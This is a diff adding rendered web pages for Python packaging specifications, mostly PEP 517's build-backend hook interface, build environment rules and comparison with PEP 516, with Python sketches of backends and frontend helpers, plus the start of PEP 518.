Where the build-backend key exists, this takes precedence and the source tree follows the format and +conventions of the specified backend (as such no setup.py is needed unless the backend requires it). +Projects may still wish to include a setup.py for compatibility with tools that do not use this spec.

+

This PEP also defines a backend-path key for use in pyproject.toml, see +the “In-Tree Build Backends” section below. This key would be used as follows:

+
[build-system]
+# Defined by PEP 518:
+requires = ["flit"]
+# Defined by this PEP:
+build-backend = "local_backend"
+backend-path = ["backend"]
+
+
+
+

Build requirements

+

This PEP places a number of additional requirements on the “build requirements” section of pyproject.toml. These are intended to ensure that projects do not create impossible-to-satisfy conditions with their build requirements.

+
    +
  • Project build requirements will define a directed graph of requirements +(project A needs B to build, B needs C and D, etc.) This graph MUST NOT +contain cycles. If (due to lack of co-ordination between projects, for +example) a cycle is present, front ends MAY refuse to build the project.
  • +
  • Where build requirements are available as wheels, front ends SHOULD use these +where practical, to avoid deeply nested builds. However front ends MAY have +modes where they do not consider wheels when locating build requirements, and +so projects MUST NOT assume that publishing wheels is sufficient to break a +requirement cycle.
  • +
  • Front ends SHOULD check explicitly for requirement cycles, and terminate +the build with an informative message if one is found.
  • +
+

Note in particular that the requirement for no requirement cycles means that +backends wishing to self-host (i.e., building a wheel for a backend uses that +backend for the build) need to make special provision to avoid causing cycles. +Typically this will involve specifying themselves as an in-tree backend, and +avoiding external build dependencies (usually by vendoring them).
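A sketch of the cycle check front ends SHOULD perform; get_build_requirements is a hypothetical callback returning the names a project needs in order to build:

def check_for_cycles(project, get_build_requirements, stack=()):
    # Walk the directed graph of build requirements depth-first and fail
    # with an informative message if a project reaches itself.
    if project in stack:
        cycle = " -> ".join(stack + (project,))
        raise RuntimeError("build requirement cycle: " + cycle)
    for dep in get_build_requirements(project):
        check_for_cycles(dep, get_build_requirements, stack + (project,))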

+
+
+
+

Build backend interface

+

The build backend object is expected to have attributes which provide +some or all of the following hooks. The common config_settings +argument is described after the individual hooks.

+
+

Mandatory hooks

+
+

build_wheel

+
def build_wheel(wheel_directory, config_settings=None, metadata_directory=None):
+    ...
+
+
+

Must build a .whl file, and place it in the specified wheel_directory. It +must return the basename (not the full path) of the .whl file it creates, +as a unicode string.

+

If the build frontend has previously called prepare_metadata_for_build_wheel +and depends on the wheel resulting from this call to have metadata +matching this earlier call, then it should provide the path to the created +.dist-info directory as the metadata_directory argument. If this +argument is provided, then build_wheel MUST produce a wheel with identical +metadata. The directory passed in by the build frontend MUST be +identical to the directory created by prepare_metadata_for_build_wheel, +including any unrecognized files it created.

+

Backends which do not provide the prepare_metadata_for_build_wheel hook may +either silently ignore the metadata_directory parameter to build_wheel, +or else raise an exception when it is set to anything other than None.

+

To ensure that wheels from different sources are built the same way, frontends +may call build_sdist first, and then call build_wheel in the unpacked +sdist. But if the backend indicates that it is missing some requirements for +creating an sdist (see below), the frontend will fall back to calling +build_wheel in the source directory.

+

The source directory may be read-only. Backends should therefore be +prepared to build without creating or modifying any files in the source +directory, but they may opt not to handle this case, in which case +failures will be visible to the user. Frontends are not responsible for +any special handling of read-only source directories.

+

The backend may store intermediate artifacts in cache locations or +temporary directories. The presence or absence of any caches should not +make a material difference to the final result of the build.

+
+
+

build_sdist

+
def build_sdist(sdist_directory, config_settings=None):
+    ...
+
+
+

Must build a .tar.gz source distribution and place it in the specified +sdist_directory. It must return the basename (not the full path) of the +.tar.gz file it creates, as a unicode string.

+

A .tar.gz source distribution (sdist) contains a single top-level directory called +{name}-{version} (e.g. foo-1.0), containing the source files of the +package. This directory must also contain the +pyproject.toml from the build directory, and a PKG-INFO file containing +metadata in the format described in +PEP 345. Although historically +zip files have also been used as sdists, this hook should produce a gzipped +tarball. This is already the more common format for sdists, and having a +consistent format makes for simpler tooling.

+

The generated tarball should use the modern POSIX.1-2001 pax tar format, which +specifies UTF-8 based file names. This is not yet the default for the tarfile +module shipped with Python 3.6, so backends using the tarfile module need to +explicitly pass format=tarfile.PAX_FORMAT.

+

Some backends may have extra requirements for creating sdists, such as version +control tools. However, some frontends may prefer to make intermediate sdists +when producing wheels, to ensure consistency. +If the backend cannot produce an sdist because a dependency is missing, or +for another well understood reason, it should raise an exception of a specific +type which it makes available as UnsupportedOperation on the backend object. +If the frontend gets this exception while building an sdist as an intermediate +for a wheel, it should fall back to building a wheel directly. +The backend does not need to define this exception type if it would never raise +it.
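A sketch of this build-via-sdist flow with its fallback; for simplicity the hooks are called in-process here, whereas a real frontend would run each hook in a fresh subprocess as described later:

import os
import tarfile
import tempfile

def build_wheel_via_sdist(backend, source_dir, wheel_directory):
    # wheel_directory must be absolute, since we change directory below.
    unsupported = getattr(backend, "UnsupportedOperation", ())
    os.chdir(source_dir)  # hooks run with cwd at the source tree root
    try:
        sdist_dir = tempfile.mkdtemp()
        sdist_name = backend.build_sdist(sdist_dir)
    except unsupported:
        # Backend cannot make an sdist here: build in the source directory.
        return backend.build_wheel(wheel_directory)
    with tarfile.open(os.path.join(sdist_dir, sdist_name)) as tf:
        tf.extractall(sdist_dir)
    unpacked = os.path.join(sdist_dir, sdist_name[:-len(".tar.gz")])
    os.chdir(unpacked)
    return backend.build_wheel(wheel_directory)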

+
+
+
+

Optional hooks

+
+

get_requires_for_build_wheel

+
def get_requires_for_build_wheel(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional list of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file, to be installed when calling the build_wheel or +prepare_metadata_for_build_wheel hooks.

+

Example:

+
def get_requires_for_build_wheel(config_settings):
+    return ["wheel >= 0.25", "setuptools"]
+
+
+

If not defined, the default implementation is equivalent to return [].

+
+
+

prepare_metadata_for_build_wheel

+
def prepare_metadata_for_build_wheel(metadata_directory, config_settings=None):
+    ...
+
+
+

Must create a .dist-info directory containing wheel metadata +inside the specified metadata_directory (i.e., creates a directory +like {metadata_directory}/{package}-{version}.dist-info/). This +directory MUST be a valid .dist-info directory as defined in the +wheel specification, except that it need not contain RECORD or +signatures. The hook MAY also create other files inside this +directory, and a build frontend MUST preserve, but otherwise ignore, such files; +the intention +here is that in cases where the metadata depends on build-time +decisions, the build backend may need to record these decisions in +some convenient format for re-use by the actual wheel-building step.

+

This must return the basename (not the full path) of the .dist-info +directory it creates, as a unicode string.

+

If a build frontend needs this information and the method is +not defined, it should call build_wheel and look at the resulting +metadata directly.

+
+
+

get_requires_for_build_sdist

+
def get_requires_for_build_sdist(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional list of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file. These dependencies will be installed when calling the +build_sdist hook.

+

If not defined, the default implementation is equivalent to return [].

+
+

Note

+

Editable installs

+

This PEP originally specified another hook, install_editable, to do an +editable install (as with pip install -e). It was removed due to the +complexity of the topic, but may be specified in a later PEP.

+

Briefly, the questions to be answered include: what reasonable ways exist of implementing an ‘editable install’? Should the backend or the frontend pick how to make an editable install? And if the frontend does, what does it need from the backend to do so?

+
+
+
+
+

Config settings

+
config_settings
+
+
+

This argument, which is passed to all hooks, is an arbitrary +dictionary provided as an “escape hatch” for users to pass ad-hoc +configuration into individual package builds. Build backends MAY +assign any semantics they like to this dictionary. Build frontends +SHOULD provide some mechanism for users to specify arbitrary +string-key/string-value pairs to be placed in this dictionary. +For example, they might support some syntax like --package-config CC=gcc. +In case a user provides duplicate string-keys, build frontends SHOULD +combine the corresponding string-values into a list of strings. +Build frontends MAY also provide arbitrary other mechanisms +for users to place entries in this dictionary. For example, pip +might choose to map a mix of modern and legacy command line arguments +like:

+
pip install                                           \
+  --package-config CC=gcc                             \
+  --global-option="--some-global-option"              \
+  --build-option="--build-option1"                    \
+  --build-option="--build-option2"
+
+
+

into a config_settings dictionary like:

+
{
+ "CC": "gcc",
+ "--global-option": ["--some-global-option"],
+ "--build-option": ["--build-option1", "--build-option2"],
+}
+
+
+

Of course, it’s up to users to make sure that they pass options which +make sense for the particular build backend and package that they are +building.
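A sketch of such a collection step, combining duplicate keys as recommended above (the function name and input shape are illustrative):

def collect_config_settings(pairs):
    # pairs is e.g. ["CC=gcc", "--build-option=--opt1", "--build-option=--opt2"]
    settings = {}
    for pair in pairs:
        key, _, value = pair.partition("=")
        if key in settings:
            existing = settings[key]
            if isinstance(existing, list):
                existing.append(value)
            else:
                # Duplicate string-keys combine into a list of strings.
                settings[key] = [existing, value]
        else:
            settings[key] = value
    return settings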

+

The hooks may be called with positional or keyword arguments, so backends +implementing them should be careful to make sure that their signatures match +both the order and the names of the arguments above.

+

All hooks are run with working directory set to the root of the source +tree, and MAY print arbitrary informational text on stdout and +stderr. They MUST NOT read from stdin, and the build frontend MAY +close stdin before invoking the hooks.

+

The build frontend may capture stdout and/or stderr from the backend. If the +backend detects that an output stream is not a terminal/console (e.g. +not sys.stdout.isatty()), it SHOULD ensure that any output it writes to that +stream is UTF-8 encoded. The build frontend MUST NOT fail if captured output is +not valid UTF-8, but it MAY not preserve all the information in that case (e.g. +it may decode using the replace error handler in Python). If the output stream +is a terminal, the build backend is responsible for presenting its output +accurately, as for any program running in a terminal.

+

If a hook raises an exception, or causes the process to terminate, +then this indicates an error.

+
+
+

Build environment

+

One of the responsibilities of a build frontend is to set up the +Python environment in which the build backend will run.

+

We do not require that any particular “virtual environment” mechanism +be used; a build frontend might use virtualenv, or venv, or no special +mechanism at all. But whatever mechanism is used MUST meet the +following criteria:

+
    +
  • All requirements specified by the project’s build-requirements must +be available for import from Python. In particular:
      +
    • The get_requires_for_build_wheel and get_requires_for_build_sdist hooks are +executed in an environment which contains the bootstrap requirements +specified in the pyproject.toml file.
    • +
    • The prepare_metadata_for_build_wheel and build_wheel hooks are +executed in an environment which contains the +bootstrap requirements from pyproject.toml and those specified by the +get_requires_for_build_wheel hook.
    • +
    • The build_sdist hook is executed in an environment which contains the +bootstrap requirements from pyproject.toml and those specified by the +get_requires_for_build_sdist hook.
    • +
    +
  • +
  • This must remain true even for new Python subprocesses spawned by +the build environment, e.g. code like:
    import sys, subprocess
    +subprocess.check_call([sys.executable, ...])
    +
    +
    +

    must spawn a Python process which has access to all the project’s +build-requirements. This is necessary e.g. for build backends that +want to run legacy setup.py scripts in a subprocess.

    +
  • +
  • All command-line scripts provided by the build-required packages +must be present in the build environment’s PATH. For example, if a +project declares a build-requirement on flit, then the following must +work as a mechanism for running the flit command-line tool:
    import subprocess
    +import shutil
    +subprocess.check_call([shutil.which("flit"), ...])
    +
    +
    +
  • +
+

A build backend MUST be prepared to function in any environment which +meets the above criteria. In particular, it MUST NOT assume that it +has access to any packages except those that are present in the +stdlib, or that are explicitly declared as build-requirements.

+

Frontends should call each hook in a fresh subprocess, so that backends are +free to change process global state (such as environment variables or the +working directory). A Python library will be provided which frontends can use +to easily call hooks this way.
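A sketch of a per-hook subprocess runner; the hard-coded backend import is a placeholder standing in for the backend resolution described earlier (in practice this role came to be filled by the pep517 library, since renamed pyproject-hooks):

import json
import subprocess
import sys

# The runner script executed in the fresh subprocess.
RUNNER = """
import json, sys
from mybackend import build_wheel  # placeholder backend
print(json.dumps(build_wheel(sys.argv[1])))
"""

def call_build_wheel(python, wheel_directory, source_dir):
    out = subprocess.check_output([python, "-c", RUNNER, wheel_directory],
                                  cwd=source_dir)
    return json.loads(out)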

+
+

Recommendations for build frontends (non-normative)

+

A build frontend MAY use any mechanism for setting up a build +environment that meets the above criteria. For example, simply +installing all build-requirements into the global environment would be +sufficient to build any compliant package – but this would be +sub-optimal for a number of reasons. This section contains +non-normative advice to frontend implementors.

+

A build frontend SHOULD, by default, create an isolated environment +for each build, containing only the standard library and any +explicitly requested build-dependencies. This has two benefits:

+
    +
  • It allows for a single installation run to build multiple packages +that have contradictory build-requirements. E.g. if package1 +build-requires pbr==1.8.1, and package2 build-requires pbr==1.7.2, +then these cannot both be installed simultaneously into the global +environment – which is a problem when the user requests pip +install package1 package2. Or if the user already has pbr==1.8.1 +installed in their global environment, and a package build-requires +pbr==1.7.2, then downgrading the user’s version would be rather +rude.
  • +
  • It acts as a kind of public health measure to maximize the number of +packages that actually do declare accurate build-dependencies. We +can write all the strongly worded admonitions to package authors we +want, but if build frontends don’t enforce isolation by default, +then we’ll inevitably end up with lots of packages on PyPI that +build fine on the original author’s machine and nowhere else, which +is a headache that no-one needs.
  • +
+

However, there will also be situations where build-requirements are +problematic in various ways. For example, a package author might +accidentally leave off some crucial requirement despite our best +efforts; or, a package might declare a build-requirement on foo >= +1.0 which worked great when 1.0 was the latest version, but now 1.1 +is out and it has a showstopper bug; or, the user might decide to +build a package against numpy==1.7 – overriding the package’s +preferred numpy==1.8 – to guarantee that the resulting build will be +compatible at the C ABI level with an older version of numpy (even if +this means the resulting build is unsupported upstream). Therefore, +build frontends SHOULD provide some mechanism for users to override +the above defaults. For example, a build frontend could have a +--build-with-system-site-packages option that causes the +--system-site-packages option to be passed to +virtualenv-or-equivalent when creating build environments, or a +--build-requirements-override=my-requirements.txt option that +overrides the project’s normal build-requirements.

+

The general principle here is that we want to enforce hygiene on +package authors, while still allowing end-users to open up the +hood and apply duct tape when necessary.

+
+
+
+

In-tree build backends

+

In certain circumstances, projects may wish to include the source code for the +build backend directly in the source tree, rather than referencing the backend +via the requires key. Two specific situations where this would be expected +are:

+
    +
  • Backends themselves, which want to use their own features for building +themselves (“self-hosting backends”)
  • +
  • Project-specific backends, typically consisting of a custom wrapper around a +standard backend, where the wrapper is too project-specific to be worth +distributing independently (“in-tree backends”)
  • +
+

Projects can specify that their backend code is hosted in-tree by including the +backend-path key in pyproject.toml. This key contains a list of +directories, which the frontend will add to the start of sys.path when +loading the backend, and running the backend hooks.

+

There are two restrictions on the content of the backend-path key:

+
    +
  • Directories in backend-path are interpreted as relative to the project +root, and MUST refer to a location within the source tree (after relative +paths and symbolic links have been resolved).
  • +
  • The backend code MUST be loaded from one of the directories specified in +backend-path (i.e., it is not permitted to specify backend-path and +not have in-tree backend code).
  • +
+

The first restriction is to ensure that source trees remain self-contained, +and cannot refer to locations outside of the source tree. Frontends SHOULD +check this condition (typically by resolving the location to an absolute path +and resolving symbolic links, and then checking it against the project root), +and fail with an error message if it is violated.

+

The backend-path feature is intended to support the implementation of +in-tree backends, and not to allow configuration of existing backends. The +second restriction above is specifically to ensure that this is how the feature +is used. Front ends MAY enforce this check, but are not required to. Doing so +would typically involve checking the backend’s __file__ attribute against +the locations in backend-path.
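A sketch of the containment check described above (the function name is an assumption):

import os

def validate_backend_path(project_root, backend_path):
    root = os.path.realpath(project_root)
    for entry in backend_path:
        # Resolve relative paths and symbolic links before checking.
        resolved = os.path.realpath(os.path.join(root, entry))
        if os.path.commonpath([root, resolved]) != root:
            raise ValueError("%r is outside the source tree" % entry)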

+
+
+
+

Source distributions

+

We continue with the legacy sdist format, adding some new restrictions. +This format is mostly +undefined, but basically comes down to: a file named +{NAME}-{VERSION}.{EXT}, which unpacks into a buildable source tree +called {NAME}-{VERSION}/. Traditionally these have always +contained setup.py-style source trees; we now allow them to also +contain pyproject.toml-style source trees.

+

Integration frontends require that an sdist named +{NAME}-{VERSION}.{EXT} will generate a wheel named +{NAME}-{VERSION}-{COMPAT-INFO}.whl.

+

The new restrictions for sdists built by PEP 517 backends are:

+
    +
  • They will be gzipped tar archives, with the .tar.gz extension. Zip +archives, or other compression formats for tarballs, are not allowed at +present.
  • +
  • Tar archives must be created in the modern POSIX.1-2001 pax tar format, which +uses UTF-8 for file names.
  • +
  • The source tree contained in an sdist is expected to include the +pyproject.toml file.
  • +
+
+
+

Evolutionary notes

+

A goal here is to make it as simple as possible to convert old-style +sdists to new-style sdists. (E.g., this is one motivation for +supporting dynamic build requirements.) The ideal would be that there +would be a single static pyproject.toml that could be dropped into any +“version 0” VCS checkout to convert it to the new shiny. This is +probably not 100% possible, but we can get close, and it’s important +to keep track of how close we are… hence this section.

+

A rough plan would be: Create a build system package +(setuptools_pypackage or whatever) that knows how to speak +whatever hook language we come up with, and convert them into calls to +setup.py. This will probably require some sort of hooking or +monkeypatching to setuptools to provide a way to extract the +setup_requires= argument when needed, and to provide a new version +of the sdist command that generates the new-style format. This all +seems doable and sufficient for a large proportion of packages (though +obviously we’ll want to prototype such a system before we finalize +anything here). (Alternatively, these changes could be made to +setuptools itself rather than going into a separate package.)

+

But there remain two obstacles that mean we probably won’t be able to +automatically upgrade packages to the new format:

+
    +
  1. There currently exist packages which insist on particular packages +being available in their environment before setup.py is +executed. This means that if we decide to execute build scripts in +an isolated virtualenv-like environment, then projects will need to +check whether they do this, and if so then when upgrading to the +new system they will have to start explicitly declaring these +dependencies (either via setup_requires= or via static +declaration in pyproject.toml).
  2. +
  3. There currently exist packages which do not declare consistent +metadata (e.g. egg_info and bdist_wheel might get different +install_requires=). When upgrading to the new system, projects +will have to evaluate whether this applies to them, and if so they +will need to stop doing that.
  4. +
+
+
+

Rejected options

+
    +
  • We discussed making the wheel and sdist hooks build unpacked directories +containing the same contents as their respective archives. In some cases this +could avoid the need to pack and unpack an archive, but this seems like +premature optimisation. It’s advantageous for tools to work with archives +as the canonical interchange formats (especially for wheels, where the archive +format is already standardised). Close control of archive creation is +important for reproducible builds. And it’s not clear that tasks requiring an +unpacked distribution will be more common than those requiring an archive.
  • +
  • We considered an extra hook to copy files to a build directory before invoking +build_wheel. Looking at existing build systems, we found that passing +a build directory into build_wheel made more sense for many tools than +pre-emptively copying files into a build directory.
  • +
  • The idea of passing build_wheel a build directory was then also deemed an +unnecessary complication. Build tools can use a temporary directory or a cache +directory to store intermediate files while building. If there is a need, a +frontend-controlled cache directory could be added in the future.
  • +
  • For build_sdist to signal a failure for an expected reason, various +options were debated at great length, including raising +NotImplementedError and returning either NotImplemented or None. +Please do not attempt to reopen this discussion without an extremely good +reason, because we are quite tired of it.
  • +
  • Allowing the backend to be imported from files in the source tree would be +more consistent with the way Python imports often work. However, not allowing +this prevents confusing errors from clashing module names. The initial +version of this PEP did not provide a means to allow backends to be +imported from files within the source tree, but the backend-path key +was added in the next revision to allow projects to opt into this behaviour +if needed.
  • +
+
+
+

Summary of changes to PEP 517

+

The following changes were made to this PEP after the initial reference +implementation was released in pip 19.0.

+
    +
  • Cycles in build requirements were explicitly prohibited.
  • +
  • Support for in-tree backends and self-hosting of backends was added by +the introduction of the backend-path key in the [build-system] +table.
  • +
  • Clarified that the setuptools.build_meta:__legacy__ PEP 517 backend is +an acceptable alternative to directly invoking setup.py for source trees +that don’t specify build-backend explicitly.
  • +
+
+
+

Appendix A: Comparison to PEP 516

+

PEP 516 is a competing proposal to specify a build system interface, which +has now been rejected in favour of this PEP. The primary difference is +that our build backend is defined via a Python hook-based interface +rather than a command-line based interface.

+

This appendix documents the arguments advanced for this PEP over PEP 516.

+

We do not expect that specifying Python hooks rather than command line +interfaces will, by itself, reduce the +complexity of calling into the backend, because build frontends will +in any case want to run hooks inside a child – this is important to +isolate the build frontend itself from the backend code and to better +control the build backends execution environment. So under both +proposals, there will need to be some code in pip to spawn a +subprocess and talk to some kind of command-line/IPC interface, and +there will need to be some code in the subprocess that knows how to +parse these command line arguments and call the actual build backend +implementation. So this diagram applies to all proposals equally:

+
+-----------+          +---------------+           +----------------+
+| frontend  | -spawn-> | child cmdline | -Python-> |    backend     |
+|   (pip)   |          |   interface   |           | implementation |
++-----------+          +---------------+           +----------------+
+
+
+

The key difference between the two approaches is how these interface +boundaries map onto project structure:

+
.-= This PEP =-.
+
++-----------+          +---------------+    |      +----------------+
+| frontend  | -spawn-> | child cmdline | -Python-> |    backend     |
+|   (pip)   |          |   interface   |    |      | implementation |
++-----------+          +---------------+    |      +----------------+
+                                            |
+|______________________________________|    |
+   Owned by pip, updated in lockstep        |
+                                            |
+                                            |
+                                 PEP-defined interface boundary
+                               Changes here require distutils-sig
+
+
+.-= Alternative =-.
+
++-----------+    |     +---------------+           +----------------+
+| frontend  | -spawn-> | child cmdline | -Python-> |    backend     |
+|   (pip)   |    |     |   interface   |           | implementation |
++-----------+    |     +---------------+           +----------------+
+                 |
+                 |     |____________________________________________|
+                 |      Owned by build backend, updated in lockstep
+                 |
+    PEP-defined interface boundary
+  Changes here require distutils-sig
+
+
+

By moving the PEP-defined interface boundary into Python code, we gain +three key advantages.

+

First, because there will likely be only a small number of build +frontends (pip, and… maybe a few others?), while there will +likely be a long tail of custom build backends (since these are chosen +separately by each package to match their particular build +requirements), the actual diagrams probably look more like:

+
.-= This PEP =-.
+
++-----------+          +---------------+           +----------------+
+| frontend  | -spawn-> | child cmdline | -Python+> |    backend     |
+|   (pip)   |          |   interface   |        |  | implementation |
++-----------+          +---------------+        |  +----------------+
+                                                |
+                                                |  +----------------+
+                                                +> |    backend     |
+                                                |  | implementation |
+                                                |  +----------------+
+                                                :
+                                                :
+
+.-= Alternative =-.
+
++-----------+          +---------------+           +----------------+
+| frontend  | -spawn+> | child cmdline | -Python-> |    backend     |
+|   (pip)   |       |  |   interface   |           | implementation |
++-----------+       |  +---------------+           +----------------+
+                    |
+                    |  +---------------+           +----------------+
+                    +> | child cmdline | -Python-> |    backend     |
+                    |  |   interface   |           | implementation |
+                    |  +---------------+           +----------------+
+                    :
+                    :
+
+
+

That is, this PEP leads to less total code in the overall +ecosystem. And in particular, it reduces the barrier to entry of +making a new build system. For example, this is a complete, working +build backend:

+
# mypackage_custom_build_backend.py
+import os.path
+import pathlib
+import tarfile
+
+SDIST_NAME = "mypackage-0.1"
+SDIST_FILENAME = SDIST_NAME + ".tar.gz"
+WHEEL_FILENAME = "mypackage-0.1-py2.py3-none-any.whl"
+
+#################
+# sdist creation
+#################
+
+def _exclude_hidden_and_special_files(archive_entry):
+    """Tarfile filter to exclude hidden and special files from the archive"""
+    if archive_entry.isfile() or archive_entry.isdir():
+        if not os.path.basename(archive_entry.name).startswith("."):
+            return archive_entry
+
+def _make_sdist(sdist_dir):
+    """Make an sdist and return its filename"""
+    sdist_path = pathlib.Path(sdist_dir) / SDIST_FILENAME
+    # Close the tarfile so the archive is fully written to disk
+    with tarfile.open(sdist_path, "w:gz", format=tarfile.PAX_FORMAT) as sdist:
+        # Tar up the whole directory, minus hidden and special files
+        sdist.add(os.getcwd(), arcname=SDIST_NAME,
+                  filter=_exclude_hidden_and_special_files)
+    return SDIST_FILENAME
+
+def build_sdist(sdist_dir, config_settings):
+    """PEP 517 sdist creation hook"""
+    return _make_sdist(sdist_dir)
+
+#################
+# wheel creation
+#################
+
+def get_requires_for_build_wheel(config_settings):
+    """PEP 517 wheel building dependency definition hook"""
+    # As a simple static requirement, this could also just be
+    # listed in the project's build system dependencies instead
+    return ["wheel"]
+
+def build_wheel(wheel_directory,
+                config_settings=None, metadata_directory=None):
+    """PEP 517 wheel creation hook"""
+    from wheel.archive import archive_wheelfile
+    path = os.path.join(wheel_directory, WHEEL_FILENAME)
+    archive_wheelfile(path, "src/")
+    return WHEEL_FILENAME
+
+
+

Of course, this is a terrible build backend: it requires the user to have manually set up the wheel metadata in src/mypackage-0.1.dist-info/; when the version number changes it must be manually updated in multiple places… but it works, and more features could be added incrementally. Much experience suggests that large successful projects often originate as quick hacks (e.g., Linux – “just a hobby, won’t be big and professional”; IPython/Jupyter – a grad student’s $PYTHONSTARTUP file), so if our goal is to encourage the growth of a vibrant ecosystem of good build tools, it’s important to minimize the barrier to entry.

+

Second, because Python provides a simpler yet richer structure for +describing interfaces, we remove unnecessary complexity from the +specification – and specifications are the worst place for +complexity, because changing specifications requires painful +consensus-building across many stakeholders. In the command-line +interface approach, we have to come up with ad hoc ways to map +multiple different kinds of inputs into a single linear command line +(e.g. how do we avoid collisions between user-specified configuration +arguments and PEP-defined arguments? how do we specify optional +arguments? when working with a Python interface these questions have +simple, obvious answers). When spawning and managing subprocesses, +there are many fiddly details that must be gotten right, subtle +cross-platform differences, and some of the most obvious approaches – +e.g., using stdout to return data for the build_requires operation +– can create unexpected pitfalls (e.g., what happens when computing +the build requirements requires spawning some child processes, and +these children occasionally print an error message to stdout? +obviously a careful build backend author can avoid this problem, but +the most obvious way of defining a Python interface removes this +possibility entirely, because the hook return value is clearly +demarcated).

+

In general, the need to isolate build backends into their own process +means that we can’t remove IPC complexity entirely – but by placing +both sides of the IPC channel under the control of a single project, +we make it much cheaper to fix bugs in the IPC interface than if +fixing bugs requires coordinated agreement and coordinated changes +across the ecosystem.

+

Third, and most crucially, the Python hook approach gives us much +more powerful options for evolving this specification in the future.

+

For concreteness, imagine that next year we add a new +build_sdist_from_vcs hook, which provides an alternative to the current +build_sdist hook where the frontend is responsible for passing +version control tracking metadata to backends (including indicating when all +on disk files are tracked), rather than individual backends having to query that +information themselves. In order to manage the transition, we’d want it to be +possible for build frontends to transparently use build_sdist_from_vcs when +available and fall back onto build_sdist otherwise; and we’d want it to be +possible for build backends to define both methods, for compatibility +with both old and new build frontends.

+

Furthermore, our mechanism should also fulfill two more goals: (a) If +new versions of e.g. pip and flit are both updated to support +the new interface, then this should be sufficient for it to be used; +in particular, it should not be necessary for every project that +uses flit to update its individual pyproject.toml file. (b) +We do not want to have to spawn extra processes just to perform this +negotiation, because process spawns can easily become a bottleneck when +deploying large multi-package stacks on some platforms (Windows).

+

In the interface described here, all of these goals are easy to +achieve. Because pip controls the code that runs inside the child +process, it can easily write it to do something like:

+
command, backend, args = parse_command_line_args(...)
+if command == "build_sdist":
+   if hasattr(backend, "build_sdist_from_vcs"):
+       backend.build_sdist_from_vcs(...)
+   elif hasattr(backend, "build_sdist"):
+       backend.build_sdist(...)
+   else:
+       # error handling
+
+
+

In the alternative where the public interface boundary is placed at +the subprocess call, this is not possible – either we need to spawn +an extra process just to query what interfaces are supported (as was +included in an earlier draft of PEP 516, an alternative to this), or +else we give up on autonegotiation entirely (as in the current version +of that PEP), meaning that any changes in the interface will require +N individual packages to update their pyproject.toml files before +any change can go live, and that any changes will necessarily be +restricted to new releases.

+

One specific consequence of this is that in this PEP, we’re able to +make the prepare_metadata_for_build_wheel command optional. In our design, +this can be readily handled by build frontends, which can put code in +their subprocess runner like:

+
import os
+
+def dump_wheel_metadata(backend, working_dir):
+    """Dumps wheel metadata to working directory.
+
+       Returns absolute path to resulting metadata directory
+    """
+    if hasattr(backend, "prepare_metadata_for_build_wheel"):
+        subdir = backend.prepare_metadata_for_build_wheel(working_dir)
+    else:
+        wheel_fname = backend.build_wheel(working_dir)
+        already_built = os.path.join(working_dir, "ALREADY_BUILT_WHEEL")
+        with open(already_built, "w") as f:
+            f.write(wheel_fname)
+        subdir = unzip_metadata(os.path.join(working_dir, wheel_fname))
+    return os.path.join(working_dir, subdir)
+
+def ensure_wheel_is_built(backend, output_dir, working_dir, metadata_dir):
+    """Ensures built wheel is available in output directory
+
+       Returns absolute path to resulting wheel file
+    """
+    already_built = os.path.join(working_dir, "ALREADY_BUILT_WHEEL")
+    if os.path.exists(already_built):
+        with open(already_built, "r") as f:
+            wheel_fname = f.read().strip()
+        working_path = os.path.join(working_dir, wheel_fname)
+        final_path = os.path.join(output_dir, wheel_fname)
+        os.rename(working_path, final_path)
+        os.remove(already_built)
+    else:
+        wheel_fname = backend.build_wheel(output_dir, metadata_dir=metadata_dir)
+    return os.path.join(output_dir, wheel_fname)
+
+
+

and thus expose a totally uniform interface to the rest of the frontend, +with no extra subprocess calls, no duplicated builds, etc. But +obviously this is the kind of code that you only want to write as part +of a private, within-project interface (e.g. the given example requires that +the working directory be shared between the two calls, but not with any +other wheel builds, and that the return value from the metadata helper function +will be passed back in to the wheel building one).

+

(And, of course, making the metadata command optional is one piece +of lowering the barrier to entry for developing new backends, as discussed +above.)

+
+

Other differences

+

Besides the key command line versus Python hook difference described +above, there are a few other differences in this proposal:

+
    +
  • Metadata command is optional (as described above).
  • +
  • We return metadata as a directory, rather than a single METADATA +file. This aligns better with the way that in practice wheel metadata +is distributed across multiple files (e.g. entry points), and gives us +more options in the future. (For example, instead of following the PEP +426 proposal of switching the format of METADATA to JSON, we might +decide to keep the existing METADATA the way it is for backcompat, +while adding new extensions as JSON “sidecar” files inside the same +directory. Or maybe not; the point is it keeps our options more open.)
  • +
  • We provide a mechanism for passing information between the metadata step and the wheel building step. I guess everyone will probably agree this is a good idea?
  • +
  • We provide more detailed recommendations about the build environment, +but these aren’t normative anyway.
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0517.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0518/index.html b/pep-0518/index.html new file mode 100644 index 00000000000..2dfd54beee5 --- /dev/null +++ b/pep-0518/index.html @@ -0,0 +1,719 @@ + + + + + + + + PEP 518 – Specifying Minimum Build System Requirements for Python Projects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 518 – Specifying Minimum Build System Requirements for Python Projects

+
+
Author:
+
Brett Cannon <brett at python.org>, +Nathaniel J. Smith <njs at pobox.com>, +Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
10-May-2016
+
Post-History:
+
10-May-2016, +11-May-2016, +13-May-2016
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies how Python software packages should specify what +build dependencies they have in order to execute their chosen build +system. As part of this specification, a new configuration file is +introduced for software packages to use to specify their build +dependencies (with the expectation that the same configuration file +will be used for future configuration details).

+
+
+

Rationale

+

When Python first developed its tooling for building distributions of +software for projects, distutils [1] was the chosen +solution. As time went on, setuptools [2] gained popularity +to add some features on top of distutils. Both used the concept of a +setup.py file that project maintainers executed to build +distributions of their software (as well as users to install said +distribution).

+

